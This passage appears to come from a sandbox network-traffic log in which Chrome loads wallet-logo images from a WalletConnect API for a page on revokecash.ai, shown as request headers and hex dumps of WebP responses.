                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:24 UTC946INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 63 66 65 36 31 38 64 66 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 33 30 31 39 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:24 GMTContent-Type: image/webpContent-Length: 2762Connection: closeCF-Ray: 8336f3ccfe618dfc-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 3019Cache-Control: pu
                                                                          2023-12-10 16:44:24 UTC423INData Raw: 52 49 46 46 c2 0a 00 00 57 45 42 50 56 50 38 20 b6 0a 00 00 f0 4e 00 9d 01 2a 90 01 90 01 3e 49 24 90 46 22 a2 21 a1 23 d5 78 28 50 09 09 67 6e e3 40 1c b2 8f 8e f3 75 87 e8 bf 95 5a e8 dc f3 f1 8b fa e7 ec ff 44 96 88 f7 47 f2 73 91 a8 f0 7a 1d ea 0f e8 ff bc 7f 5f fd a7 ed 01 e6 01 fc 03 f8 67 f8 4f eb 9f 94 dd c4 3c c0 7f 42 fe e7 fb 1d ef ff e8 2f fc e7 a8 07 f7 2f f1 9f fb bd bf fd 40 3d 00 3c db 3f e1 fe e8 7c 15 fe d7 fe de fc 07 fe b5 7f e6 f6 00 df 7a f2 cf 62 ff ea b2 11 00 43 f1 8c 43 8e 36 f9 1e 05 ff 5d ac 0a 65 bf b4 9e 79 7e 8f f6 0d e8 71 e9 2c 15 f2 e0 fa d4 c5 6c 0b 28 1f 5a 98 ad 81 65 03 eb 53 15 b0 2c a0 7d 6a 62 b6 05 94 0f ad 4c 56 c0 b2 81 f5 a9 8a d8 16 50 3e b5 31 5b 02 ca 07 d6 a6 2b 60 59 40 fa d4 c5 6c 0b 28 1f 5a 98 ad 81 65
                                                                          Data Ascii: RIFFWEBPVP8 N*>I$F"!#x(Pgn@uZDGsz_gO<B//@=<?|zbCC6]ey~q,l(ZeS,}jbLVP>1[+`Y@l(Ze
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: 23 b1 2d 3b c8 fa 76 7b 79 18 18 55 40 10 7a be 50 dd 4c e4 f4 56 d7 c0 54 5c 31 5e a4 d6 f5 ec a2 62 b6 05 94 0f ad 4b 84 c7 9f ef f4 db 55 16 99 32 52 a8 db 35 6c 04 22 62 b6 05 94 0f 67 00 c5 89 d8 f6 70 2c 90 2f 3b f9 3c d1 d3 6e b5 c2 b4 cb 83 eb 53 15 a8 b3 e5 64 0e dd 58 16 51 12 ed 61 1e fc 04 ec 06 93 83 56 05 94 0f 5e cb da 47 9b e7 76 48 b9 64 63 7b 38 4b 53 5e 28 3e 3d 6a 5c 3b c3 9d 67 8d b1 a0 57 b3 29 2d aa 7c 80 9f 9e c4 84 f2 0b 97 29 bf ff e9 a6 4a e6 cf 2c c7 88 43 55 60 2c a0 7d 6a 64 fb 38 ef d7 27 61 2b 41 f5 a9 8a d8 16 50 3e b5 31 5b 02 ca 07 d6 a6 2b 60 59 40 fa d4 c5 6c 0b 28 1f 5a 98 ad 81 65 03 eb 53 15 b0 2c a0 7d 6a 62 b6 05 94 0f ad 4c 56 c0 b2 81 f5 a9 8a d8 16 50 2e 00 00 fe fe cb 77 ce 37 53 bd 78 f9 3c 88 53 f3 89 e1 00
                                                                          Data Ascii: #-;v{yU@zPLVT\1^bKU2R5l"bgp,/;<nSdXQaV^GvHdc{8KS^(>=j\;gW)-|)J,CU`,}jd8'a+AP>1[+`Y@l(ZeS,}jbLVP.w7Sx<S
                                                                          2023-12-10 16:44:24 UTC970INData Raw: 84 15 42 28 d2 6c cf 60 35 9f 39 e5 bf 37 4e d0 9f be b0 42 c7 33 5f 56 d9 ff a0 c8 1f 03 50 a8 7e 12 e1 a0 a7 25 9d d0 02 ee 8e d6 ee 18 e0 bd 95 90 71 fd bc ac 3f 46 4b df e4 60 2f 13 a8 cb 93 84 e6 90 25 18 71 df 84 f3 be 7f cc 6f 9c 1d 63 14 3d 42 0e 88 c6 cb ce 8a 21 29 c6 84 39 6f 42 4f ce 55 2c 0d df dd 5d 03 4a 09 3c 6f c9 3d 0e df 6b 0b b4 2c 72 a2 87 e3 45 12 25 ee d5 b7 2e ae d6 99 c4 79 b7 2d d2 43 7e 06 64 be 38 9a 06 c6 dc 43 32 35 4a 87 8f 7c 0c aa a3 de 04 59 a7 d8 f2 23 82 39 77 58 d1 c8 05 4a e5 40 64 dc 0c b4 52 3c 55 77 df 9c 39 c5 1a 31 0e d2 d1 f8 45 65 10 5e 8c f4 ed 1f fc eb a0 d0 23 e7 3c 7e a5 dd e2 74 75 1b e5 75 3c 07 aa 1d b2 78 c4 a2 fb 54 fc b5 de 3e ae b7 29 6d 58 0d 6c 59 bb 52 b9 57 b4 69 33 9e 72 b6 90 46 91 cc 26 1e c5
                                                                          Data Ascii: B(l`597NB3_VP~%q?FK`/%qoc=B!)9oBOU,]J<o=k,rE%.y-C~d8C25J|Y#9wXJ@dR<Uw91Ee^#<~tuu<xT>)mXlYRWi3rF&


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.549748104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC748OUTGET /w3m/v1/getWalletImage/a7f416de-aa03-4c5e-3280-ab49269aef00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:24 UTC948INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 39 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 63 66 66 65 66 64 62 30 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 31 32 30 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:24 GMTContent-Type: image/webpContent-Length: 2090Connection: closeCF-Ray: 8336f3ccffefdb09-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 12024Cache-Control: p
                                                                          2023-12-10 16:44:24 UTC421INData Raw: 52 49 46 46 22 08 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 8f 01 00 8f 01 00 41 4c 50 48 c1 04 00 00 01 a0 04 db da e2 36 fa 5a dd 19 92 e4 72 4b ed 30 27 5a b9 c2 2c 7b 15 53 38 71 b2 b4 83 2a af 53 9c 28 c3 14 66 06 39 9c 1d 1b b6 61 83 aa 34 1a 0e a3 52 dd 5a c8 1e d4 b4 b2 90 f2 2f 4c 4d a9 fa be a1 3f 22 26 00 ec e9 ee 17 28 ae fe 38 52 1f 7f a1 e5 18 32 e6 b4 47 d1 86 c8 47 55 45 81 fe 1f c0 5b d2 3d aa 72 fd d9 66 8d a1 a7 1a 3d b9 61 de 28 b7 d3 b9 94 b2 2f eb 7e ce 30 34 4d df bb f2 69 99 e2 72 2c 51 29 d9 1f 4b 31 74 6d ff 6e f7 74 45 74 22 cf 84 95 37 75 86 b4 fa cd 55 e3 3c 0e 23 f8 66 1f 7e ca 50 f7 c1 f1 85 3e 07 11 06 84 ea 34 86 be 6d 17 e7 2b 4e a1 cc b9 9e 66 28 fc eb e5 99 05 4e e0 2d 39 93 61 68 ac 5f a8 78 cf 6e 52 e1 ee
                                                                          Data Ascii: RIFF"WEBPVP8XALPH6ZrK0'Z,{S8q*S(f9a4RZ/LM?"&(8R2GGUE[=rf=a(/~04Mir,Q)K1tmntEt"7uU<#f~P>4m+Nf(N-9ah_xnR
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: 65 c3 a4 a5 2a 43 f9 64 b5 60 d4 c4 28 43 fa d6 71 06 f5 8d 30 b4 3f e6 37 44 0c a5 f0 ee b7 1a c9 88 c9 31 86 f8 2d 85 06 bc b7 9d a1 fe 6e 6f cf 2a 12 b8 97 28 e9 51 ef 0b 0c f9 4f fb 7b 32 4b c7 be cc 1c a1 7b fe cb 0c fd af 0f e8 de 82 5f f1 2f 1d 12 ba e3 bb c4 08 b0 ce d7 9d 45 6d 14 a0 cd ee 86 e7 38 23 c1 c3 9e ae c6 3d a0 81 97 93 bb 10 57 31 22 5c 25 76 a6 dc a2 82 9b 4a 67 d3 75 2a d0 4b 3a 71 ed 66 64 b8 5f ec a0 7c 47 07 31 7f 87 b2 76 3a 48 95 76 f8 94 11 e2 97 00 e0 be 4a 09 75 6e 80 51 f7 28 e1 de 28 80 79 7f 51 c2 eb 4a 80 d5 8c 14 d7 c1 fb 11 5a 38 eb ee 1f a5 85 e6 7e 01 95 16 b4 40 11 23 c6 e2 6a 6a a8 fa 98 1a 3e aa a5 86 da 46 6a a8 8f 52 43 fc 11 35 bc d0 a8 41 cb 51 43 8e 71 ff 73 ff 73 ff 73 ff 73 ff 73 ff 73 ff 73 ff 73 ff 73 ff
                                                                          Data Ascii: e*Cd`(Cq0?7D1-no*(QO{2K{_/Em8#=W1"\%vJgu*K:qfd_|G1v:HvJunQ((yQJZ8~@#jj>FjRC5AQCqsssssssss
                                                                          2023-12-10 16:44:24 UTC300INData Raw: 78 17 95 8f 76 16 98 6f 36 13 a9 f6 13 12 ab b2 37 b7 f1 28 e7 ff 0b 0a 93 ec 89 98 08 30 3b 40 68 1d ba 3e 8f 4f 87 3f fd 11 42 a7 f1 95 d3 ff 0b 38 9e a8 de fd 25 1c 01 76 ae 7a 3c 9d cd 74 0c 87 58 ee dc 8e 1f fb ad ec 20 fd 47 e7 fb 1e b4 83 ed 33 c4 3f 41 ef fd a6 a3 c3 75 2e 88 6b fd fe 3b a5 e8 61 57 ef 84 98 b7 e5 d6 fa 8c 10 be ce b7 c5 9a a2 2d 6e b2 1b d3 40 9c 00 00 01 12 ba 49 1c 6e 64 f1 38 a5 c1 c6 97 14 63 62 aa 3c 30 0c 81 87 aa ef 1e be ce 4c df 90 be 39 16 d3 82 dc ac c4 4f ec c4 6a 12 66 fc 85 8b 65 d9 c2 09 cf 6d ff 27 3f f7 2c 70 0b a3 d9 d1 af 63 e2 63 b3 5c be d6 f7 32 ed 7d 15 54 ae bc 7c 4d 8b ae af 51 06 12 82 3b 17 6b ee 72 c5 78 a7 a8 54 07 31 ba 4c ca ad 57 c8 ee 4b 57 3f b2 ff c3 2d ea b7 19 ad 9c d5 ff e0 3f c2 7f ec 57 37
                                                                          Data Ascii: xvo67(0;@h>O?B8%vz<tX G3?Au.k;aW-n@Ind8cb<0L9Ojfem'?,pcc\2}T|MQ;krxT1LWKW?-?W7


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.549750104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC748OUTGET /w3m/v1/getWalletImage/c39b3a16-1a38-4588-f089-cb7aeb584700?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:24 UTC948INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 30 35 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 63 66 39 62 63 36 64 61 61 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 31 32 30 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:24 GMTContent-Type: image/webpContent-Length: 5054Connection: closeCF-Ray: 8336f3ccf9bc6daa-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 12024Cache-Control: p
                                                                          2023-12-10 16:44:24 UTC421INData Raw: 52 49 46 46 b6 13 00 00 57 45 42 50 56 50 38 20 aa 13 00 00 70 6e 00 9d 01 2a 90 01 90 01 3e 49 24 91 45 a2 a2 21 92 9a 8c 28 28 04 84 b2 b7 72 9d 58 b4 fc 4b 96 f7 01 b6 e5 30 05 69 fe 93 b5 03 c8 f7 7f ca cf c6 9f 9c cb 1b f5 4f c0 ff 8b bf 30 7c 25 eb ef 33 ff 1d fd 0f fc af f8 af dd af e9 5f 47 3d 23 f9 86 7f 0c fe 91 fe af fb ef f8 4f d7 ef af 5e 99 7f f8 fa 1b f3 5d ff 7b fb 61 f0 3b d0 0b f9 1f f7 df fb bd 90 3e 83 7f bb 1e ad 5f ef ff 6e 3f f3 7c ba 7e c6 fe b4 fb 43 6a 81 b4 df f5 dc b2 9e dd e8 15 fc c3 ee ef ec fd 82 76 bf c0 2f d9 df e7 7d 95 5f 86 e0 8b fa f0 ef bd 5f 1b 71 a7 31 a1 12 b6 64 51 0f 08 80 5a 17 16 5f be e0 bd c1 7b 82 f7 05 ee 0b dc 17 b8 2f 70 5e e0 bd a9 df 0d 55 81 f7 4c d7 e7 62 01 68 5c 59 67 4e 5c 5e 67 cd 91 43 c2 20 16
                                                                          Data Ascii: RIFFWEBPVP8 pn*>I$E!((rXK0iO0|%3_G=#O^]{a;>_n?|~Cjv/}__q1dQZ_{/p^ULbh\YgN\^gC
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: ab d6 1e cc 8b be e0 bd c1 7b 7e b0 8e f9 6f f0 a2 1e 18 bd c1 ce 86 82 3e 2a 8b 78 40 8b ef 69 66 96 62 7a d0 c1 e0 39 c8 01 cf 65 ea 89 68 5c 59 6d f0 4a 1b 21 d4 a6 af f9 86 ce c7 c1 45 dd 9b 9d e9 43 15 db 83 35 b6 16 98 ec 0c 8a 21 e1 0f fd d8 23 0e 2f 20 3b b6 7c b2 58 a6 f8 ff 64 72 57 c0 eb 2f 32 9d 2d 62 d0 30 63 2c 08 2f 00 df 8b 5a 25 a1 f4 9a 95 3c bb d9 c4 02 d0 b8 b2 c5 80 c4 6c 1b 43 0a 9d e9 96 1c 63 cc 6c 45 d3 c1 47 5e 9c 3a a1 ce 05 64 3b 81 dd c4 b4 94 57 1b 36 30 04 44 d0 77 00 29 bd c1 7b 82 f2 a3 dc fd f2 9e ed b0 1d 22 6d 95 c2 96 7c 36 48 d1 90 39 fe 93 b1 4a 32 da 5a e5 74 f5 3a 94 8c 08 3e e0 bd c1 60 36 36 a3 de 8f 02 b4 e3 d2 00 85 44 06 71 ca 52 94 7c 82 d2 e8 ce 1e 43 0e b3 de 91 a9 61 99 7f 7d c1 78 7b 8b 76 a0 ab dd 73 42
                                                                          Data Ascii: {~o>*x@ifbz9eh\YmJ!EC5!#/ ;|XdrW/2-b0c,/Z%<lCclEG^:d;W60Dw){"m|6H9J2Zt:>`66DqR|Ca}x{vsB
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: 50 49 07 0d 68 1e ea e5 fd cc 0d a3 f1 1d b7 65 76 4b 49 4b d2 09 bd eb a9 93 6a 32 73 57 bb 99 ca 27 ba a6 5c 27 bc 71 1a 70 74 c7 bc 87 38 a6 89 98 10 93 83 49 60 78 46 4d e7 2d a2 3e e5 e2 2f 84 8a ff 2b 12 1f 91 6b 13 df 7f a4 03 e1 30 42 fb c8 cc 0f 1f f0 49 6c 25 cc 5e 3d 9b 05 08 78 75 3c ed 37 1a 48 a7 32 86 64 29 39 65 aa ef cd e2 d4 f3 2b 73 ac 36 56 41 19 b6 17 21 38 8e 6b 6f 83 db 27 97 90 59 41 28 53 94 3e e6 73 f1 04 b3 45 3f 92 62 7b 4e 68 5c 47 7d 3f 0a 20 1e 8e 27 20 a8 c2 af 8a 79 8c 4b cc b5 9e d4 09 ec f2 18 f6 50 d5 13 c6 35 99 6e 1d 5a a0 92 04 cb 37 3a 77 2f ab fb 00 f9 02 e9 22 fd 84 5f 42 06 52 0d 89 c5 f0 b4 fb 53 c2 ab b5 ff a2 27 9f 6d 2a 0a d7 21 52 ff b5 79 d5 ea e7 5f a6 32 a3 6e a4 e5 ac 5e 51 dc fc 88 67 b2 24 84 78 69 6e
                                                                          Data Ascii: PIhevKIKj2sW'\'qpt8I`xFM->/+k0BIl%^=xu<7H2d)9e+s6VA!8ko'YA(S>sE?b{Nh\G}? ' yKP5nZ7:w/"_BRS'm*!Ry_2n^Qg$xin
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: 77 90 6c ba 1a 51 28 13 cf 07 b5 f8 c8 9d 40 0f 74 73 0a 6b f6 cc f8 1d ef 5a e7 b7 65 eb 0a ed a7 f6 b8 dd 3d 56 2b e3 f3 d2 01 70 20 4f cf 0c 81 dd 3b da 34 a3 d3 15 8e 24 7f 62 bf 68 32 af d1 e4 b5 37 89 62 1b 9c 11 2a 22 aa 04 5f 4d 15 41 42 27 f3 f6 5e 61 cd 05 7c 61 5c fd f8 a3 5c 1e d2 a2 a8 7b 76 5a 33 c5 43 70 b0 8c 4a 6b 7a 03 91 e1 a4 99 4f 76 f3 a6 91 5f 1e 3f 43 7e 6d 20 67 8b ed ff dc c3 83 e4 3d 27 b1 85 68 59 ea ad 1a c7 c0 5c 6c 92 3f 71 7d 96 c4 2d 3b a3 cc 2e 1e 6f c3 cc 03 6c ca 1c 7e 38 da b2 61 6d a3 31 76 bc aa 72 5a a6 8e bb db 46 6b 09 85 30 67 60 9c 7d a3 e4 d0 c6 3f 1f 25 a5 05 b9 9f e2 96 42 9f 7f e3 a5 d9 67 33 80 73 3e e8 cd 20 c9 04 ea d1 54 9d 10 35 05 fb f2 14 fa 00 fe 85 ae 20 82 d4 fa 00 d3 1f 98 d0 0d 24 47 eb 6d 4e 4e
                                                                          Data Ascii: wlQ(@tskZe=V+p O;4$bh27b*"_MAB'^a|a\\{vZ3CpJkzOv_?C~m g='hY\l?q}-;.ol~8am1vrZFk0g`}?%Bg3s> T5 $GmNN
                                                                          2023-12-10 16:44:24 UTC526INData Raw: 1f b6 f5 d5 cd 8d b2 7b 88 25 0d 58 42 c8 80 d0 cd e4 28 27 24 d8 48 9a fc 0f 36 7d 04 14 cc 15 48 aa fa 6f 73 97 97 9f 33 cc 1d 99 2a 38 a6 78 7c 9b 18 44 b0 01 9d 6e d6 f0 4a 61 7e 3d cd 5c 8e bb 02 32 6f 38 3f de 62 22 e0 ad 15 17 c7 08 40 b2 12 1b c7 bf db 7a de 53 95 25 b3 9f 00 18 52 67 94 eb 53 68 ef 09 29 d7 8f dc bb ac 40 34 98 c8 94 3d af f1 76 90 e4 23 84 de 52 12 f9 26 b2 06 e5 85 74 54 0b 06 8f 7c 97 16 d9 9b c5 78 da a2 d2 ef 84 10 17 c4 40 d2 47 1f e8 67 90 4d 01 3d ba 52 f7 4c e3 8f 4f 08 7d 2f 7e 92 be 2f 77 ee 3a 50 d1 74 62 07 4f a7 ad a2 d8 d3 56 5d 0f db 7a 6f e6 bc 6e d4 ce 52 1d d1 bc 2c d6 d4 9a 5e 11 a3 c9 33 79 e9 00 c8 78 8b 36 bb 38 4a 8b dd 3b 03 b2 65 b7 f0 39 9b e0 90 d0 c5 29 f0 21 a2 ec 24 29 a9 e6 5e e5 47 cd 92 c4 d1 eb
                                                                          Data Ascii: {%XB('$H6}Hos3*8x|DnJa~=\2o8?b"@zS%RgSh)@4=v#R&tT|x@GgM=RLO}/~/w:PtbOV]zonR,^3yx68J;e9)!$)^G


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.549749104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:24 UTC748OUTGET /w3m/v1/getWalletImage/9f259366-0bcd-4817-0af9-f78773e41900?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Origin: https://revokecash.ai
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://revokecash.ai/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:24 UTC947INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 77 65 62 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 31 37 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 63 63 66 63 62 38 35 63 38 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 41 67 65 3a 20 33 30 31 38 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:24 GMTContent-Type: image/webpContent-Length: 7170Connection: closeCF-Ray: 8336f3ccfcb85c84-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: *Age: 3018Cache-Control: pu
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: 52 49 46 46 fa 1b 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 8f 01 00 8f 01 00 41 4c 50 48 5d 00 00 00 01 57 a0 a0 6d 1b 86 3f e6 fe 8d 44 44 64 18 e4 29 b0 8a 6c bb 49 9a 90 98 0a c5 00 df 48 88 18 d0 db 61 23 fa 3f 01 f3 72 10 f7 18 0e 62 2d 47 a1 e7 a3 b0 f2 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff 3d 1a f8 af 1c 85 1e 8f 42 9d db 41 dc 00 00 56 50 38 20 76 1b 00 00 70 88 00 9d 01 2a 90 01 90 01 3e 49 24 90 45 a2 a2 21 92 3a 84 90 28 04 84 b1 b7 77 30 68 01 e6 bf f1 6f f9 fe 61 9a 49 53 33 90 87 f1 c7 b7 74 73 63 51 fd d4 df af fd 1f fb 07 ec d7 f5 1f ff fe 6b da 57 ac 7f 63 fd a4 ff 17 fb af d4 65 c9 3f 57 fc fd f9 39 db 16 7e 3d 7a f6 c3 f6 1f cf bf 29 be 6b fe c8 7b 1b fd 55 ff 23 dc 03 f8 37 f1 1f f5
                                                                          Data Ascii: RIFFWEBPVP8XALPH]Wm?DDd)lIHa#?rb-G=BAVP8 vp*>I$E!:(w0hoaIS3tscQkWce?W9~=z)k{U#7
                                                                          2023-12-10 16:44:24 UTC1369INData Raw: 7f 4f a7 e6 bd 83 95 f0 a5 a2 8e db b3 95 5e f7 6a da 1f b8 fe 6b 76 c7 01 52 d5 02 42 7f 6e 83 d4 ee 2d 64 b2 22 13 90 02 a7 4e f8 14 d6 ba ec 8f 72 ca 67 94 96 fb 59 ef b3 70 17 37 f6 52 a3 aa 42 c4 c3 a4 ac 39 ab 4d 1a 33 b4 72 93 87 5d 4e db ad 13 5a 50 e7 54 59 6d a1 54 2e 67 ba c8 1e e1 27 00 2f df e0 a6 f3 80 0c df 5e f5 89 3a 76 a8 73 3b 93 24 cb 36 b2 59 c7 bb e9 a9 0b b1 59 4e 04 ed f9 a8 f7 81 3f cf af 79 19 f5 17 57 da 03 21 f0 6f d1 0c 45 88 27 dc 0b 46 46 fb dc cb 7d fe 51 f3 09 83 c5 9f 77 11 fc 25 47 bf 51 0c 26 de 1c e2 f6 89 37 9b 85 e2 1c b2 7d 8d 08 aa 28 87 f2 5e ba 7b 28 46 4d 07 8f 29 6d c2 c0 c7 52 f5 7d c3 ca af 88 56 02 fd 54 f2 61 0d 3d f6 b2 34 4b a2 e3 50 75 af b5 27 ef d8 b3 e9 e0 d7 c4 1e c7 14 f1 71 7f f5 00 aa d7 65 c2 a1
                                                                          Data Ascii: O^jkvRBn-d"NrgYp7RB9M3r]NZPTYmT.g'/^:vs;$6YYN?yW!oE'FF}Qw%GQ&7}(^{(FM)mR}VTa=4KPu'qe
